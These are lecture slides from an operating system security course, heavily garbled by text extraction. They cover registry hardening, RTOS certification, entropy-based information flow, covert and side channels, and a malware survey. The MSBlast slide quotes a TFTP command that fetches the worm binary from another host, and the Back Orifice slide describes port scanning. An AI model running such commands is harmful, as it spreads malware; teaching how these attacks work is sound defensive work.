INSE 6130 Operating System...

INSE 6130 Operating System Security

Odds and Ends

Prof. Lingyu Wang

1

OutlineOutline

Registry SecurityEmbedded and Real-Time OS SecurityInformation FlowThe Phantom Menace Review for Final Exam

2

RegistryRegistryWhat is registry

Configuration data stored in a hierarchical databaseConfiguration data stored in a hierarchical databaseReplacement of .ini, .sys, and .com configuration filesA tree with five root keysy

HKEY_LOCAL_MACHINE: hardware/OS data of this computerHKEY_CLASSES_ROOT: OLE and file-class association dataHKEY CURRENT USER: profile for user logged on interactivelyHKEY_CURRENT_USER: profile for user logged on interactively HKEY_USERS: actively user profiles of non-remote usersHKEY_CURRENT_CONFIG: hardware profile

Hives (trees rooted at top)Hives (trees rooted at top)DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config and ntuser dat in C:\Documents and Settings\administrator

3

and ntuser.dat in C:\Documents and Settings\administrator

http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx

Registry Best PracticeRegistry Best Practice

One incorrect edit to the registry can crash the ti toperating system

If you are not completely sure about what you are doing, then better don't do itdoing, then better don t do it

Backup before you modify itUse the backup utility (accessories->system tools)Use the backup utility (accessories system tools)Export/import registry hives

4

Access Control on RegistryAccess Control on Registry

What you can do in regeditd h ld“can” does not mean you should

Grant full control/ownership of a registry key Assign (customized) permissions to a registry key toAssign (customized) permissions to a registry key to users or groupsAudit users/groups’ activity on a registry keyg p y g y y

Restricting accessesLocal accesses: you can only make it inconvenientRemote accesses: shouldn’t be given in most cases

Domain controllers have accesses

5

Registry Hacks for Hardening OSRegistry Hacks for Hardening OS

E.g., prevent NTLM password hashesd d 2000 k b d h hXP and Windows 2000 use kerberos and NTLM hash is

there for backwards compatibilityNTLM hashes can be easily broken by Rainbow crackNTLM hashes can be easily broken by Rainbow crack

KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa Win2K: Add NoLMHash = 1Xp: Value name: NoLMHash Data type: REG DWORD Radix:Xp: Value name: NoLMHash, Data type: REG_DWORD Radix: Decimal Value data: 1

E.g., prevent (SYN) DoS attacks in W2kThe connection responses time out more quickly in the event of a SYN attack

HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services

6

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key: SynAttackProtectValue: 0,1,2 (default to best protection)

OutlineOutline


7

Where Are Embedded/Real-time OS?Where Are Embedded/Real time OS?

Bombardier Challenger 300

h d fl h

US Army's Crusader

RTOS in the adaptive flight display systems

RTOS processes ballistic calculations, the graphical user interface and real-ti i t t l

F-35time equipment control systems

F 35

RTOS powers a portion of the Panoramic Cockpit Display subsystem

8

p y y

http://www.lynuxworks.com/rtos/rtos-178.php

Why Are Such Systems different?Why Are Such Systems different?

A time constraint on an operation MUST be met dl f th t l dregardless of the system load

Not the case on our PCsA good example: Anti lock braking system (ABS)A good example: Anti-lock braking system (ABS)

System reliability, availability, etc.Availability= (mean time toMTTFAvailability= (mean time to

failure/recovery)MTTRMTTF +

9

The Standard for RTOSThe Standard for RTOSDO-178B: "Software Considerations in Airborne Systems and Equipment Certification"and Equipment Certification

A de facto standard for certifying aviation software, such as RTOSSoftware systems are categorized by the effects of their failures

A: Catastrophic - Failure may cause a crash B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane .. C M j F il i i ifi t b t h l i t th tC: Major - Failure is significant, but has a lesser impact that a Hazardous failure (e.g., leads to passenger discomfort)D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e g causing passenger inconvenience or a flight plan change)failure (e.g., causing passenger inconvenience or a flight plan change) E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload

The development process of a software is subject to different

10

The development process of a software is subject to different requirements based on its level

LynxOS-178 RTOSLynxOS 178 RTOS

An RTOS certifiable to DO-178B level Ad h h f d fProvides security through fixed partitions of resources

(time and memory)System events in one partition cannot interfere withSystem events in one partition cannot interfere with events in another

E.g., CD player and ABS

11

Safety and SecuritySafety and Security

Common Criteria (CC)d d ( SO/ C 08) fA standard (ISO/IEC 15408) for computer security

A framework for specifying security requirements and implementing/claiming and testing such requirementsimplementing/claiming and testing such requirements

DO-178B and CCSoftware developed to DO-178B Level A standards willSoftware developed to DO 178B Level A standards will map closely to either an EAL 4 or 5CC basically requires a small kernel capable of control i f ti fl d i t i d t i l tiinformation flow and maintain data isolation DO-178B kernel space partitioning provides bothFrom DO 178B to EAL 7 mostly formal method

12

From DO-178B to EAL 7, mostly formal method

http://www.csds.uidaho.edu/comparison/stc2002.pdf

OutlineOutline


13

What We Already KnowWhat We Already Know

Information flows whenl d ( h)I write to slides (push)

You read slides (pull)You read what I have writtenYou read what I have written

Information flow policy in BLP and BibaBLP: flow up (e g unclassfied to secret)BLP: flow up (e.g., unclassfied to secret)Biba: flow down (e.g., high integrity to low integrity)Chinese Wall: flow inside a CD (except sanitized)( p )

Question:How to we model/measure “information flow”?

14

/

Answer: EntropyAnswer: EntropyH(X) = - Σi p(X=xi) log2 p(X=xi)

M th t i t f XMeasures the uncertainty of XHow many bits required to represent X

ExampleExampleX = 0 or 1, equally likely

H(X) = - ( p(X=0)log2 p(X=0) + p(X=1)log2 (X=1) )H(X) = ( p(X=0)log2 p(X=0) + p(X=1)log2 (X=1) )= - (1/2 log2 1/2 + 1/2 log2 1/2 ) = 1

Y = 1 certainly; Y=0 impossible H(Y) = - ( p(Y=1)log2 p(Y=1) )

= - 1 log2 1 = 0

15

The IntuitionThe IntuitionQuestion: Do you need to know entropy in the final exam?

B f t d lBefore today, no clueAnswer: Yes 50% No 50% entropy 1

Right now, likelyRight now, likelyAnswer: Yes 60% No 40% entropy 0.97

After the final exam…Answer: Yes - 100% or 0% entropy 0

Seeing slides, or the exam decreases your uncertaintySeeing slides, or the exam decreases your uncertainty (entropy) about the question

Information flows to you from slides (exam)M i f ti fl t f th f lid

16

More information flows to you from exam than from slides

Example 1Example 1Suppose

X b ith 0 1 ll lik lX can be either 0 or 1, equally likelySo, H(X) = 1

IfIfValue assignment Y := X (X: exam question; Y: my expression)

ThenThenH(X|Y) = 0 , knowing Y gives you X (Looking at my expression

gives you the exam question)g y q )

Value assignment causes information flow X → YWhat if c : value assignment Y := 1? (I am expressionless)

17


0 ≤ X ≤ 7 ll lik l0 ≤ X ≤ 7, equally likelySo, H(X) = –8(1/8) log2 (1/8) = 3Z = 1 2 or 3 equally likelyZ = 1, 2 or 3, equally likely

IfY := X + ZY := X + Z

ThenKnowing Y, X can have at most 3 valuesKnowing Y, X can have at most 3 valuesH(X | Y) < –3(1/3) log (1/3) = log2 3 < 3Information flows X → Y

18


X ll lik l t b ith 0 1X equally likely to be either 0 or 1y equally likely to be either true or falseH(X) = 1 H(Y) = 1H(X) = 1, H(Y) = 1

IfX > 0 ? Y:= true : Y:= falseX > 0 ? Y:= true : Y:= false

ThenH(X|Y) = 0H(X|Y) 0Information flows X → Y

Implicit information flow

19

pNo direct value assignment between X and Y

Confinement ProblemConfinement ProblemPrevent leaking confidential information

E If l i t i kEasy: If processes only communicate via known communication channels

IsolationIsolationVirtual machines

OS runs on emulated ‘computer’, restrictied by VM

SandboxingA virtual machine for process, instead of OS

VMware

WindowsJVM

Windowshardware hardware

20

Linux Applet

Covert ChannelCovert ChannelIsolation only prevents direct communication via known channelsknown channelsCovert channel is a communication channel not intended for communicationintended for communication

Storage channel, shared storage-basedTiming channel, time-basedTiming channel, time based

21

Example 1 – Storage ChannelExample 1 Storage ChannelProcesses p, q not allowed to communicate

B t th h fil tBut they share a file system

They set up a storage channelAgree on two file names /tmp001 txt and /tmp002 txtAgree on two file names, /tmp001.txt and /tmp002.txt If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txt/ p ; / pq records a bit based on the file name, and then deletes the file, so p can send the next bit

p q

/

1 p q

/

0

22

/tmp001.txt /tmp002.txt

Example 2 – Timing ChannelExample 2 Timing ChannelTiming attack on cryptosystem

Modular exponentiation algorithm (square and multiply)Modular exponentiation algorithm (square and multiply)Computes x = az mod n, where z = z0 … zk–1

x := 1; atmp := a;f i 0 t k 1 d b ifor i := 0 to k–1 do beginif zi = 1 then

x := (x * atmp) mod n;atmp := (atmp * atmp) mod n;p ( p p) ;

endresult := x;

Each 1 bit of z results in two multiplicationsRun time will be proportional to number of 1 bits

23

Example 3 – Timing ChannelExample 3 Timing ChannelTwo processes set up a timing channel

T d 0 bit li i h CPU it t CPUTo send 0 bit: p relinquishes CPU as soon as it gets CPUTo send 1 bit: p uses CPU for the full timing slotq determines a bit by seeing how quickly it gets CPUq determines a bit by seeing how quickly it gets CPU

p gets CPU, and relinquishes it p gets CPU p relinquishes CPU

q gets CPU1

q gets CPU0

24

Noise/Mitigation of Covert ChannelNoise/Mitigation of Covert ChannelWhen many processes share the same resource, the covert channel will be noisycovert channel will be noisy

Noise will reduce the capacity of a covert channelBut does not remove it (remember any communicationBut does not remove it (remember any communication channel is noisy)

Mitigation of covert channel: obscure resource usageg gDevote uniform, fixed amount of resources to each process, even if some resources are wasted

C t l CPU l ( RTOS)Crypto example, CPU example (e.g., RTOS)

Inject randomness into allocation/use of resources

25

Make Positive Use of Covert ChannelMake Positive Use of Covert ChannelTracking anonymous P2P VOIP calls AliceP2P VOIP calls

The connection between them is mixed

Alice

bet ee t e s edwith many others

Headers modifiedPayload encrypted

Anonymizing networkPayload encrypted

Suppose we suspect Alice is talking to BobgHow do we prove it?

Bob

26

Make Use of Covert Channel Cont’dMake Use of Covert Channel Cont dTrack the call by transmitting a watermark through a timing channel based on inter packet delaystiming channel based on inter-packet delays

BobAlice

BobAlice Add Watermark: 1011Detect Watermark

Bit 1 Bit 0

27

Bit 1 Bit 0

Question: why we always move packet to the right?

Web-based ApplicationWeb based Application

Internet

Client ServerEncrypted Traffic

Advantages:

Less client-side resources

Characteristics:

Low entropy inputsLess client side resources

Easier to deliver and maintain

Low entropy inputs

Rich & diverse resource objects

Stateful communications

28

Side-Channel AttackSide Channel Attack

InternetSize and directions of packets

Client ServerEncrypted Traffic

pbetween users and search engine

Fixed pattern: identified input t i

User Input Observed Directional Packet Sizes

string

a: 801→, ←54, ←509, 60→

00: 812→, ←54, ←505, 60→,

813 54 507 60813→, ←54, ←507, 60→

b-byte s-byte

29

Indicator of input itself

Side-Channel Attack Cont’dSide Channel Attack Cont dS value for each character entered as:First keystroke: Second keystroke:

a b c d e f g

509 504 502 516 499 504 502

y y

First Keystroke

Second Keystroke

a b c dh i j k l m n

509 492 517 499 501 503 488

o p q r s t

e a b c d

a 509 487 493 501 497

b 504 516 488 482 481o p q r s t

509 525 494 498 488 494

u v w x y z

b 504 516 488 482 481

c 502 501 488 473 477

d 516 543 478 509 499503 522 516 491 502 501 d 516 543 478 509 499

Unique s value 12 out of 1616 out of 16In reality, it may take more than

30

two keystrokes to uniquely identify an input string.

Leak out users’ private information: the input string

OutlineOutline


31

The Phantom MenaceThe Phantom Menace

M li iMaliciousPrograms

Needs HostProgram Independent

Trapdoors Logic Bombs Trojan Horses Viruses Worms Zombies RootkitsTrapdoors Logic Bombs Trojan Horses Viruses Worms Zombies Rootkits

32

BackdoorBackdoorSecret entry point into a system

Special user identifier/password that circumvents normal securitySpecial user identifier/password that circumvents normal security procedures.

Commonly used by developersy y pCould be included in a compiler (e.g., Ken Thompson)

Example: Back Orifice (BO) Win98 at DEFCON 6 in 1998, BO2k in 1999 BO server can be embedded in an executable file, when you run that file, BO silently installs itself as 122K “ .exe”that file, BO silently installs itself as 122K .exeRun a BO client, scan network for port 31337 (ELEET-elite), find any BO server - that machine is yours

33

Logic BombLogic Bomb

Embedded in legitimate programsActivated when specified conditions met

E.g., presence/absence of some file; Particular date/time or particular userdate/time or particular user

When triggered, typically damages systemModify/delete files/disksy

Example: “CIA slipped bugs to Soviets”“In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Sovieta CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that l t t i d h l i i Sib i t l

34

later triggered a huge explosion in a Siberian natural gas pipeline”

RootkitRootkit

A set of programs and codes that allows a t i t t d t t blpermanent or consistent, undetectable presence

on a computerHide malicious resources e g processes filesHide malicious resources, e.g., processes, files, registry keys, open ports, etc.Provide hidden backdoor accesses

Simple rootkits:Modify user programs (ls, ps), detectable by tools like Tripwire

Sophisticated rootkits:

35

Modify the kernel itself, hard to detect from userland

WormWorm

Runs independently hDoes not require a host program

Propagates a fully working version of itself to other machinesother machinesCarries a payload performing hidden tasks

Backdoors spam relays DDoS agents;Backdoors, spam relays, DDoS agents; …

PhasesProbing Exploitation Replication PayloadProbing Exploitation Replication Payload

36

Worm PropagationWorm Propagation

1:Target Probing

2: Vulnerability Exploitation

A Worm A Victim3: Replication

A Staged View of Worm Infection

37

MSBlast Worm (Aug 2003)MSBlast Worm (Aug., 2003)10. Closes connection 11. Shell closes

7. Runs TFTP command;

8. Sends “START msblast.exe” command 9. Runs worm on target!

>tftp –I 192.168.0.1 GET msblast.exe

C “ ”5. Creates “TFTP Server” on port 69/UDP

6. Sends “TFTP” command to shell “teleports” msblast.exe file

1. Exploits target on port 135/TCP 2. Binds svchost.exe to port3. Connects to target on port 4444/TCP

4. Creates a shell “cmd.exe” and binds it to port 4444/TCP

Blaster Target/RPC

p g p4444/TCP via injected code

38

192.168.0.1 192.168.10.11

BotnetBotnetZombie

A computer that is secretly installed with TrojanA computer that is secretly installed with Trojan horse and can be used for attacksBots join specific IRC channel on a Server and wait j pfor further commandsAttacker remotely controls the bot

BotnetA network of zombies controlled by a ‘bot herder’

f l h d f bConsisting of several ten thousands of botsUsually for malicious purposes

39

Botnets Cont’dBotnets Cont d

Botnet is usually for profitb d l f S ( S) kDistributed Denial-of-Service (DDoS) Attacks

Spamming – install SOCKS v4/v5 proxy for spam emailsemailsSniffing traffic/key logging – e.g., credit card numberSpreading new worms/virusesp gAds add-ons, spyware, phishing

Paid for clicking ads (Google adsense)

Attacking IRC chat net o ks Clone attackAttacking IRC chat networks – Clone attackManipulating online polls/gamesMass Identity theft

40

Mass Identity theft

How Does Botnet Work (1)How Does Botnet Work (1)

Attacker scans1Unsecured Computers

Attacker

Attacker scansInternet for

unsecured systems that can be compromised

1

p

Internet

41


Attacker secretlyUnsecured Computers

Attacker

Attacker secretlyinstalls zombie agent

programs, turning unsecured computers

2Zombies

unsecured computers into zombies

Internet

42


Zombie agentsZombie agents

Attacker

Zombie agentsZombie agents``phone home’’

and connect to a master server

3Zombies

master server

MasterMasterServer

Internet

43


Attacker sends commands 4

AttackerZombies

to Master Server to launch a DDoS attack against a targeted system

4

MasterMasterServer

Internet

44


Master Server5

AttackerZombies

Master Serversends signal to

zombies to launch attack on targeted

5

Master

gsystem

MasterServer

Internet

d

45

TargetedSystemSystem

OutlineOutline


46

Date post:	11-Nov-2020
Category:	Documents
Upload:	others
View:	3 times
Download:	0 times